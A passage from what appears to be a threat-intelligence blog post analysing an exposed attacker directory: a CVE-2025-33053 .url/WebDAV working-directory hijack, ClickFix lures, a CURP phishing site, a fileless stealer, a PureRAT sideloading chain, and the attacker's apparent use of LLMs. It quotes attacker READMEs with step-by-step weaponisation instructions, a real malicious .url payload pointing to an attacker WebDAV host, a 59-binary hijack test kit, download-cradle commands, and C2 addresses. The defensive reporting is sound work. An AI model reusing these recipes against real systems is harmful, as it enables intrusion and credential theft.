instead of the expected local system directory.</span></p><p><span>The README files closely mirrored this logic. They called out </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span> as the preferred binary, referenced the same WebDAV working-directory pattern described in the Stealth Falcon reporting, and preserved the previously reported </span><span><span data-type="inlineCode">summerartcamp.net@ssl@443\DavWWWRoot\OSYxaOjr</span></span><span> path as an example. So if you ever wonder who reads your blogs, it seems like attackers do.</span></p><p></p><pre language="c">CVE-2025-33053 (Stealth Falcon APT) - Test Setup
=====================================================

WHAT IS THIS?
This .url file abuses iediagcmd.exe to execute a file from WebDAV
WITHOUT any security warnings. Zero alerts!

HOW IT WORKS:
1. .url file contains URL=path to iediagcmd.exe (legitimate IE tool)
2. .url sets WorkingDirectory to WebDAV share
3. When clicked: iediagcmd.exe starts with cwd = WebDAV
4. iediagcmd internally calls: route.exe, ipconfig.exe, netsh.exe, ping.exe
5. Process.Start() searches in working directory FIRST
6. WebClient auto-starts when accessing WebDAV
7. Attacker's route.exe (renamed putty.exe) runs from WebDAV
8. NO SmartScreen, NO MoTW warnings!

REQUIREMENTS TO MAKE TEST WORK:
================================

1. iediagcmd.exe MUST exist on victim machine
   Path: C:\Program Files\Internet Explorer\iediagcmd.exe
   - Win10 (1607-22H2):        YES
   - Win11 21H2/22H2/23H2:     usually YES
   - Win11 24H2 (IE removed):  NO (this is why your F-series failed!)
   - Check on victim:
     dir "C:\Program Files\Internet Explorer\iediagcmd.exe"

2. WebDAV MUST have file named EXACTLY "route.exe"
   NOT putty.exe! iediagcmd will only execute these names:
   - route.exe
   - ipconfig.exe
   - netsh.exe
   - ping.exe
   On your WebDAV server, RENAME putty.exe to route.exe
   Place at: \\TA_C2\Downloads\route.exe

3. Microsoft patch from June 2025 MUST NOT be installed
   Check: Get-HotFix | Where-Object {$_.HotFixID -match "KB5060"}
   If patched, exploit fails.

ALTERNATIVE LOLBINS (if iediagcmd.exe missing):
================================================
F4_CustomShellHost_explorer.url - uses CustomShellHost.exe
   (mentioned in CheckPoint report - spawns explorer.exe)
F5_OfficeC2RClient_alternative.url - uses Office C2R client
   (if Office is installed)

REAL ATTACK PAYLOAD WAS:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp.net@ssl@443\DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D</pre><p language="html"><span><em>Figure 2: Contents of README, likely generated by LLM, found in the exposed directory.</em></span><em><br></em>⠀</p><p><span>The testing approach was methodical and included the below:</span></p><p><span><strong>Transports</strong></span><span>: WebDAV over </span><span><span data-type="inlineCode">@80</span></span><span> and </span><span><span data-type="inlineCode">@ssl@443</span></span></p><p><span><strong>Path formats</strong></span><span>: </span><span><span data-type="inlineCode">DavWWWRoot</span></span><span> vs. plain UNC</span></p><p><span><strong>Fallback LOLBins</strong></span><span>: </span><span><span data-type="inlineCode">CustomShellHost.exe</span></span><span>, </span><span><span data-type="inlineCode">OfficeC2RClient.exe</span></span><span>, and many more for hosts where </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span> is absent</span></p><p><span><strong>Download cradles</strong></span><span>: </span><span><span data-type="inlineCode">bitsadmin /transfer</span></span><span>, </span><span><span data-type="inlineCode">certutil -urlcache -split -f</span></span><span>, </span><span><span data-type="inlineCode">mshta http(s)://…</span></span></p><p><span><strong>Shortcut launchers</strong></span><span>: PowerShell </span><span><span data-type="inlineCode">IEX (New-Object Net.WebClient).DownloadString(...)</span></span><span>, hidden/minimized windows</span></p><p><span><strong>Explorer containers</strong></span><span>: </span><span><span data-type="inlineCode">search-ms:</span></span><span> queries and </span><span><span data-type="inlineCode">.library-ms</span></span><span> files exposing remote payloads</span></p><p><span><strong>ClickFix pages</strong></span><span>: relying on user copy/paste execution</span></p><p><span><strong>Filename spoofing</strong></span><span>: RTLO (U+202E), double extensions, and whitespace padding before </span><span><span data-type="inlineCode">.exe</span></span><span> / </span><span><span data-type="inlineCode">.scr</span></span></p><h2>The lure factory</h2><p><span>The lure themes were broad and familiar: invoices, privacy policies, contracts, signed documents, finance reports, Labcorp-themed reports, salary statements, and notification policies.</span></p><p><span>Judging by the lure themes, we concluded that the attacker is targeting enterprise Windows users who are likely to open routine documents.</span></p><p><span>The threat actor also invested heavily in making files look “safe”. Many lure names mimicked PDFs or office documents. Others used fake icons associated with common software. Some attempted to hide arguments or launch windows minimized. Clearly, the goal was to make malicious execution feel like ordinary document handling.</span></p><p><span>The directory also contained ClickFix HTML lures. These pages mimicked familiar services, application errors, and document-access workflows to convince users to copy and run a command. The lures were disguised as Cloudflare verification checks, Adobe or Word document errors, Microsoft login pages, Chrome update messages, and Discord-themed notices. Filenames such as </span><span><span data-type="inlineCode">Fix_Connection_Error.html</span></span><span>, </span><span><span data-type="inlineCode">Update_Required.html</span></span><span>, </span><span><span data-type="inlineCode">Secure_Document_Access.html</span></span><span>, </span><span><span data-type="inlineCode">Verification_Failed.html</span></span><span>, and </span><span><span data-type="inlineCode">Open_Document_Instructions.html</span></span><span> show how the actor repackaged the same execution pattern under different social-engineering themes.</span></p><p><span>The commands typically launched PowerShell to fetch remote content, used </span><span><span data-type="inlineCode">cmd.exe</span></span><span> to open payloads from WebDAV or UNC paths, or used utilities like </span><span><span data-type="inlineCode">rundll32</span></span><span> and </span><span><span data-type="inlineCode">mshta</span></span><span> to proxy execution. Many referenced attacker-controlled paths, temporary directories, hidden windows, or encoded arguments to reduce visibility.</span></p><h2>The payload chains </h2><p><span>The exposed directory contained many payloads, but we did not reverse every binary in the collection. We initially started with reverse engineering, but after analyzing several chains, we found repeated packaging patterns and suspected that some staged files may have led to the same or closely related final payloads.</span></p><p><span>We therefore shifted from exhaustive reverse engineering to triage. We reviewed several files, including </span><span><span data-type="inlineCode">DlrtyGames</span></span><span>, </span><span><span data-type="inlineCode">CursorSetup</span></span><span>, </span><span><span data-type="inlineCode">ReportFinal.rsc.pdf</span></span><span>, </span><span><span data-type="inlineCode">ReportFina.exe</span></span><span> and </span><span><span data-type="inlineCode">pdfgear_setup_v2.1.16.exe</span></span><span>, and prioritized payloads that either represented distinct delivery approaches or were tied to observed campaign activity.</span></p><p><span>Our main focus became the most commonly delivered file in the most recent CURP campaign, based on artifacts we found in cPanel. This gave us the clearest link between the exposed delivery infrastructure and active campaign activity. </span></p><p><span>This scope is intentional. This post is about the attacker’s delivery workflow, not a full reverse-engineering report for every sample in the directory. We use the payload analysis to show how the operator packaged lures, staged loaders, tested execution methods, and moved from delivery to final payload execution. </span></p><h2><span>Case study 1: CURP campaign targeting Mexico</span></h2><p><span>Our MDR alert began with a user who landed on the phishing site </span><span><span data-type="inlineCode">www[.]gobf[.]mx</span></span><span>, a typosquat impersonating the Mexican government's CURP (Clave Única de Registro de Población) national-ID lookup service at </span><a href="https://www.gob.mx/curp/" target="_blank"><span>https://www.gob.mx/curp/</span></a><span>. The phishing site presented a convincing single-page application that asked victims to enter CURP identity data and retrieve an official record.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4d4e8c3f881bba8/6a5e14ba2ee1c1e5373aea06/Phishing-page-impersonating-Mexico%E2%80%99s-CURP-lookup-service.png" alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" caption="Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4d4e8c3f881bba8/6a5e14ba2ee1c1e5373aea06/Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-uid="bltc4d4e8c3f881bba8" data-sys-asset-filename="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic." data-sys-asset-alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic.</figcaption></div></figure><p>⠀</p><p><span>The site’s client-side JavaScript handled the fake ID lookup flow and then triggered payload delivery when the victim clicked the download button. Instead of downloading a PDF directly, the script invoked a </span><span><span data-type="inlineCode">search-ms:</span></span><span> URI that opened the operator’s remote WebDAV share as a Windows Explorer search view filtered to </span><span><span data-type="inlineCode">.scr</span></span><span> files:</span></p><p><span></span></p><pre language="c">search-ms:displayname=Search Results in \\onedrive.cv@80\Downloads\CURP
         &amp;query=*.scr
         &amp;crumb=location:\\onedrive.cv@80\Downloads\CURP</pre><p>⠀<br><span>It's worth mentioning that the malicious Javascript with russian comments appears to be also generated with the help of GenAI. As you can see in the screenshot above it contains emojis and comments which are very typical for the LLM models.</span></p><p><span>The exposed Simba Service panel tied this phishing flow back to the attacker’s delivery infrastructure. The </span><span><span data-type="inlineCode">CURP</span></span><span> folder was the most-accessed campaign folder, with 2,384 recorded interactions. The same count appeared for </span><span><span data-type="inlineCode">ReportFinal.rcs.pdf</span></span><span>, making it the clearest link between the phishing site, the WebDAV delivery path, and active campaign activity.</span><br></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltedc57850fe037c68/6a5e15175e34b039dfdfd8bf/Simba-Service-WebDAV-dashboard-CURP.png" alt="Simba-Service-WebDAV-dashboard-CURP.png" caption="Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltedc57850fe037c68/6a5e15175e34b039dfdfd8bf/Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-uid="bltedc57850fe037c68" data-sys-asset-filename="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions." data-sys-asset-alt="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions.</figcaption></div></figure><p>⠀</p><p><span>Although </span><span><span data-type="inlineCode">ReportFinal.rcs.pdf</span></span><span> appeared to be a PDF, it was actually a right-to-left override (RTLO) masqueraded </span><span><span data-type="inlineCode">.scr</span></span><span> executable built with a Delphi/Inno Setup installer. Once executed, it extracted and launched the </span><span><span data-type="inlineCode">Fo-Binary.exe</span></span><span> loader, initiating the multi-stage infection chain.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf312b78111eb9912/6a5e15916d22612fa5454d67/Execution-chain-PDF-lure.jpg" alt="Execution-chain-PDF-lure.jpg" caption="Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Execution-chain-PDF-lure.jpg" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf312b78111eb9912/6a5e15916d22612fa5454d67/Execution-chain-PDF-lure.jpg" data-sys-asset-uid="bltf312b78111eb9912" data-sys-asset-filename="Execution-chain-PDF-lure.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration." data-sys-asset-alt="Execution-chain-PDF-lure.jpg" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration.</figcaption></div></figure><p>⠀</p><p><span>The final payload was an unknown .NET information stealer, operated entirely fileless-ly to evade disk-based detection. The execution sequence followed as such:</span></p><ul><li><span><strong>Decryption:</strong></span><span> The </span><span><span data-type="inlineCode">Fcqleh</span></span><span> loader decrypted the embedded payload using AES and GZip.</span></li><li><p><span><strong>Reflective Loading: </strong></span><span>The loader mapped the payload directly into memory using the </span><span><span data-type="inlineCode">Assembly.Load(byte[])</span></span><span> API.</span></p></li><li><p><span><strong>Process Injection:</strong></span><span> The malicious code was executed inside a legitimate, EV-signed Qihoo 360 process via process hollowing, allowing the malicious code to run under a trusted signed process image.</span></p></li></ul><p><span>The decrypted in-memory configuration exposed the payload’s feature set and version </span><span><span data-type="inlineCode">4.4.3</span></span><span>. It also contained the build tag </span><span><span data-type="inlineCode">06x12x2026SantaEbash2</span></span><span>, which matched toolkit timestamps from June 12, 2026.</span></p><p><span>Once running, the stealer targeted cryptocurrency assets, browser data, messaging sessions, and local application data. Its collection logic included around 20 desktop wallet clients and browser wallet extensions, saved browser usernames, passwords, cookies, session tokens, the Telegram </span><span><span data-type="inlineCode">tdata</span></span><span> session database, Foxmail data, and a screenshot of the victim’s desktop.</span></p><p><span>The payload also included anti-analysis checks. The payload checked for the </span><span><span data-type="inlineCode">COR_PROFILER</span></span><span> environment variable and called </span><span><span data-type="inlineCode">IsDebuggerPresent</span></span><span>. If the malware detected that it was being monitored or debugged, it immediately called </span><span><span data-type="inlineCode">FailFast</span></span><span> to kill the process. The stealer also delayed decrypting its watchlist and collection configuration until after a successful C2 handshake, preventing its full functionality from being revealed in isolated sandboxes. </span></p><p><span>Collected data was exfiltrated to </span><span><span data-type="inlineCode">77[.]110.127.205</span></span><span> (alias </span><span><span data-type="inlineCode">google.services.ug</span></span><span>, certificate </span><span><span data-type="inlineCode">CN=Eglgyqnoa</span></span><span>) over </span><span><span data-type="inlineCode">SslStream</span></span><span> (TLS without SNI) and raw </span><span><span data-type="inlineCode">Socket</span></span><span>.</span><span>The stolen data was sent as a multipart HTTP POST request to </span><span><span data-type="inlineCode">/c2</span></span><span>.</span></p><p><span>Based on the analyzed behavior, the payload functioned as an information stealer focused on credential, wallet, and session theft.</span></p><h2>Case study 2: The "DlrtyGames" sideloading chain</h2><p><span>While the </span><span><span data-type="inlineCode">ReportFinal</span></span><span> lure used an Inno Setup installer to launch a fileless stealer, a second campaign directory on the server, </span><span><span data-type="inlineCode">DlrtyGames</span></span><span>, showed a different delivery architecture. This chain was built to deploy a modular RAT through DLL sideloading, IDAT, process hollowing, and persistence.</span></p><p><span>The </span><span><span data-type="inlineCode">DlrtyGames</span></span><span> chain began with a silent 7-Zip SFX dropper, </span><span><span data-type="inlineCode">DlrtyGames.exe</span></span><span>. It extracted a benign, signed Ubisoft binary, </span><span><span data-type="inlineCode">Volt_Droid.exe</span></span><span>, into the victim’s temporary directory alongside a trojanized dependency, </span><span><span data-type="inlineCode">discord-rpc.x64.dll</span></span><span>. </span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf89ec69e4241e5c3/6a5e1707745c95057f3acb23/DlrtyGames-execution-chain.jpg" alt="DlrtyGames-execution-chain.jpg" caption="Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="DlrtyGames-execution-chain.jpg" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf89ec69e4241e5c3/6a5e1707745c95057f3acb23/DlrtyGames-execution-chain.jpg" data-sys-asset-uid="bltf89ec69e4241e5c3" data-sys-asset-filename="DlrtyGames-execution-chain.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution." data-sys-asset-alt="DlrtyGames-execution-chain.jpg" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution.</figcaption></div></figure><p>⠀</p><p><span><span data-type="inlineCode">Volt_Droid.exe</span></span><span> used DLL sideloading to load </span><span><span data-type="inlineCode">discord-rpc.x64.dll</span></span><span>. This decoded its configuration, resolved APIs by hash, and manually mapped </span><span><span data-type="inlineCode">profiler16.dll</span></span><span>. The mapped </span><span><span data-type="inlineCode">profiler16.dll</span></span><span> stage then read </span><span><span data-type="inlineCode">loader-pool.db</span></span><span>, a PNG file whose encrypted modules were stored across IDAT chunks. After a 45-second sleep delay, it reassembled and decrypted the embedded content, set up persistence, performed COM auto-elevation through </span><span><span data-type="inlineCode">dllhost.exe</span></span><span>, and prepared the final hollowing stage.</span></p><p><span>The final injection stage was handled by an x86 PIC shellcode blob carved from </span><span><span data-type="inlineCode">loader-pool.db</span></span><span> at offset </span><span><span data-type="inlineCode">0xb516a</span></span><span>. That shellcode created signed host processes such as </span><span><span data-type="inlineCode">MegArray.exe</span></span><span> or </span><span><span data-type="inlineCode">Crisp.exe</span></span><span> in a suspended state, unmapped their original image, wrote the payload into the process, updated thread context, and resumed execution. The result was a modular .NET RAT running inside a signed host process.</span></p><p><span>The </span><span><span data-type="inlineCode">DlrtyGames</span></span><span> payload was a modular RAT with plugins for keylogging, screenshots, window monitoring, and C2 communication. Its keylogger module used plaintext keyword triggers for payment, banking, credit, and cryptocurrency activity, including </span><span><span data-type="inlineCode"><em>relaypayments.com</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>plaid</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>fiservapps</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>payoneer</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>google pay</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>coinbase</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Zelle</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>paypal</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>link.com</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>amazonrelay</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Exodus</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Electrum</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Bitcoin</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>monero</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Seed Phrase</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Seed</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>12</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>FCU</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Credit Union</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Account Overview</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Available Balance</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Merchant</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>online access</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>debit</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>credit</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>cvv</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>card</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>settlement</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>fees</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>loans</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>bank</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>banking</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>finance</em></span></span><span><em>, and </em></span><span><span data-type="inlineCode"><em>invest</em></span></span><span><em>. </em></span></p><p><span>The RAT also targeted browser wallet-extension artifacts and Chrome user data, including cookies and saved login data.</span></p><p><span>The two chains used different payloads and C2 infrastructure. In case study one, the stealer exfiltrated to </span><span><span data-type="inlineCode">77[.]110[.]127[.]205:56003</span></span><span>, while in the case study two stealer chain communicated with </span><span><span data-type="inlineCode">23[.]94[.]252[.]228:57666</span></span><span>. Based on our observations, the final RAT payload in both chains was identified as .NET-based PureRAT.</span></p><h3>GenAI adoption</h3><p><span>Several artifacts make it clear the attacker certainly used LLMs to build and iterate this operation. The directory is packed with structured README files, neatly formatted lure-generation guides, detailed test writeups, and matrix-style outputs that look exactly like templated or generated content. </span></p><p><span></span></p><pre language="c">═══════════════════════════════════════════════════════════════════
  WORKING DIRECTORY HIJACKING — COMPREHENSIVE TEST KIT
  for Windows 11 24H2
═══════════════════════════════════════════════════════════════════

This kit contains 59 .url files targeting different Windows binaries
that POTENTIALLY have the same Working Directory hijacking issue as
CVE-2025-33053 (Stealth Falcon, iediagcmd.exe).

ALL .url files use this exact format (same as the real APT attack):
  [InternetShortcut]
  URL=C:\path\to\target.exe         &lt;- legitimate binary
  WorkingDirectory=\\[REDACTED]@80\Downloads   &lt;- WebDAV (triggers WebClient!)
  ShowCommand=7                     &lt;- start minimized (hide alert windows)
  IconIndex=13                      &lt;- (decoy icon)
  IconFile=msedge.exe               &lt;- (decoy icon)

═══════════════════════════════════════════════════════════════════
HOW TO TEST (5 minutes)
═══════════════════════════════════════════════════════════════════

STEP 1: Upload ALL files from WEBDAV_PAYLOADS/ folder to:
        \\[REDACTED]\Downloads\
        (59 test files - each is 5KB MessageBox popup exe)

STEP 2: Copy I_LOLBIN_URLS/ folder to your Win11 24H2 machine

STEP 3: Double-click .url files one by one (or all of them in sequence)
        - If popup appears -&gt; HIJACK WORKS! Read parent process name in popup.
        - If nothing happens / error -&gt; doesn't work, move to next.

STEP 4: Tell me which I-numbers showed a popup. I'll integrate working
        ones as new methods in web-renamer.

═══════════════════════════════════════════════════════════════════
PRIORITY TESTING ORDER (most likely to work first)
═══════════════════════════════════════════════════════════════════

TIER 1 - CONFIRMED IN THE WILD:
  I01_iediagcmd.url           - CVE-2025-33053 (needs pre-June 2025 patch)
  I02_CustomShellHost.url     - CheckPoint research (may not exist on Server)

TIER 2 - .NET FRAMEWORK TOOLS (always installed if .NET 4.x present):
  I03_InstallUtil.url         - InstallUtilLib.dll search
  I04_RegAsm.url              - .NET registration
  I05_RegSvcs.url             - .NET services
  I06_CasPol.url              - .NET security policy
  I07_ngentask.url            - NGen native compile (calls ngen.exe!)
  I08_AddInUtil.url           - AddIn util (calls AddInProcess.exe!)
  I10_dfsvc.url               - ClickOnce service
  I15_csc.url                 - C# compiler (may call link.exe)
  I16_vbc.url                 - VB compiler

TIER 3 - WIN11 SYSTEM .NET TOOLS:
  I17_LbfoAdmin.url           - NIC teaming admin
  I19_UevAgentPolicyGenerator.url - UE-V agent (calls .ps1 files!)
  I20_UevAppMonitor.url       - UE-V monitor
  I23_AppVStreamingUX.url     - App-V streaming UI

TIER 4 - LOLBAS Execute-EXE binaries:
  I26_Pcwrun.url              - LOLBAS Execute(EXE)
  I28_WorkFolders.url         - LOLBAS Execute(EXE,Rename)
  I33_stordiag.url            - LOLBAS Execute(EXE) - calls systeminfo etc
  I36_Provlaunch.url          - LOLBAS Execute(CMD) - calls provtool.exe!

TIER 5 - UAC bypass binaries (worth testing):
  I49_fodhelper.url, I50_computerdefaults.url, I52_wsreset.url

═══════════════════════════════════════════════════════════════════
THE THEORY (so you understand WHY this works for some and not others)
═══════════════════════════════════════════════════════════════════

For the attack to succeed, the LOLBin must:
  1. Be a .NET application, OR call ShellExecute/CreateProcess with bare
     name (no full path).
  2. Spawn a child process by NAME (e.g. "ipconfig.exe") not by full path
     (e.g. "C:\Windows\System32\ipconfig.exe").
  3. Be runnable without command-line args.

If ANY of these is false, the hijack fails. Microsoft has been patching
specific binaries (iediagcmd.exe in June 2025) but the general pattern
remains. New vulnerable binaries are discovered regularly.

═══════════════════════════════════════════════════════════════════
WHAT THE POPUP TELLS YOU
═══════════════════════════════════════════════════════════════════

When hijack works, you'll see:
  TEST OK - Working Directory Hijack SUCCESS

  Executed as: route.exe                              &lt;- which name was hijacked
  Full path: \\[REDACTED]@80\Downloads\route.exe    &lt;- ran from WebDAV!
  Working dir: \\[REDACTED]@80\Downloads
  Parent process: iediagcmd                           &lt;- which LOLBin spawned it

═══════════════════════════════════════════════════════════════════
NOTES
═══════════════════════════════════════════════════════════════════

* Some I-files may target binaries that DON'T EXIST on your Win11 24H2
  (e.g. I02_CustomShellHost was missing on my test Server 2025).
  These will silently fail - just move on.

* Some I-files may launch the GUI tool (msconfig, dxdiag, etc.) WITHOUT
  triggering any hijack. That's fine - if no popup appears, no hijack.

* See _MAPPING.csv for full mapping of each .url to its target binary
  and expected child process names.</pre><p><span><em>Figure 7: Context of README.md found in the exposed directory.</em></span><em><br></em><br><span>The attacker left a build-time artifact inside the </span><span><span data-type="inlineCode">generate_test_lnk.ps1</span></span><span> output. The output directory is hardcoded in the </span><span><span data-type="inlineCode">$outDir</span></span><span> variable and exposes part of the attacker’s local project tree:</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f481d0cd28d6929/6a5e17f7b52ffd407785a683/Hardcoded-%24outDir-path.png" alt="Hardcoded-$outDir-path.png" caption="Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Hardcoded-$outDir-path.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f481d0cd28d6929/6a5e17f7b52ffd407785a683/Hardcoded-$outDir-path.png" data-sys-asset-uid="blt5f481d0cd28d6929" data-sys-asset-filename="Hardcoded-$outDir-path.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree." data-sys-asset-alt="Hardcoded-$outDir-path.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree.</figcaption></div></figure><p>⠀<em><br></em><span>It is therefore apparent that the entire campaign was likely created using the </span><a href="https://github.com/Akash-nath29/Coderrr" target="_blank"><span>CodeRRR project</span></a><span> with the help of LLM to assist with code generation and campaign development.</span></p><p><span>Another file we found in the directory was </span><span><span data-type="inlineCode">Simba_Service_Presentation.htm</span></span><span>, which appeared to document an attacker-controlled WebDAV delivery/admin panel. The panel also seems to have been generated with LLM assistance, based on its presentation-style formatting, API-documentation structure, emojis, and implementation details.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a0d6970395b2772/6a5e18471d6cdc8240fb0a26/Simba-server-screenshot-panel.png" alt="Simba-server-screenshot-panel.png" caption="Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-server-screenshot-panel.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a0d6970395b2772/6a5e18471d6cdc8240fb0a26/Simba-server-screenshot-panel.png" data-sys-asset-uid="blt8a0d6970395b2772" data-sys-asset-filename="Simba-server-screenshot-panel.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture." data-sys-asset-alt="Simba-server-screenshot-panel.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture.</figcaption></div></figure><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c958992fad5cb62/6a5e18d6f480d88e07286a8a/Simba-server-system-requirements.png" alt="Simba-server-system-requirements.png" caption="Figure 10: Simba service system requirements." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-server-system-requirements.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c958992fad5cb62/6a5e18d6f480d88e07286a8a/Simba-server-system-requirements.png" data-sys-asset-uid="blt3c958992fad5cb62" data-sys-asset-filename="Simba-server-system-requirements.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 10: Simba service system requirements." data-sys-asset-alt="Simba-server-system-requirements.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 10: Simba service system requirements.</figcaption></div></figure><p>⠀</p><p><span>The most telling artifact was a “comprehensive test kit” that expanded the single CVE-2025-33053 technique into 59 </span><span><span data-type="inlineCode">.url</span></span><span> files targeting different Windows binaries, such as .NET tools (</span><span><span data-type="inlineCode">InstallUtil</span></span><span>, </span><span><span data-type="inlineCode">RegAsm</span></span><span>, </span><span><span data-type="inlineCode">RegSvcs</span></span><span>, </span><span><span data-type="inlineCode">ngentask</span></span><span>), system utilities, LOLBAS execute-EXE binaries, and even UAC-bypass candidates. Each file was paired with a stated theory of why the working-directory hijack should work and a priority order for testing.</span></p><p><span>The directory was saturated with structured README files, neatly formatted lure-generation guides, matrix-style test write-ups, emoji-heavy admin-panel documentation, and a </span><span><span data-type="inlineCode">_MAPPING.csv</span></span><span> tying each test file to its target binary and expected child process. The consistency, verbosity, and sheer volume of organized artifacts led us to conclude that the attacker likely used an LLM-assisted workflow to do much of the heavy lifting around documentation, structure, and iteration.</span></p><p></p><pre language="c"># LNK Full Matrix Test — WebDAV Open Methods + 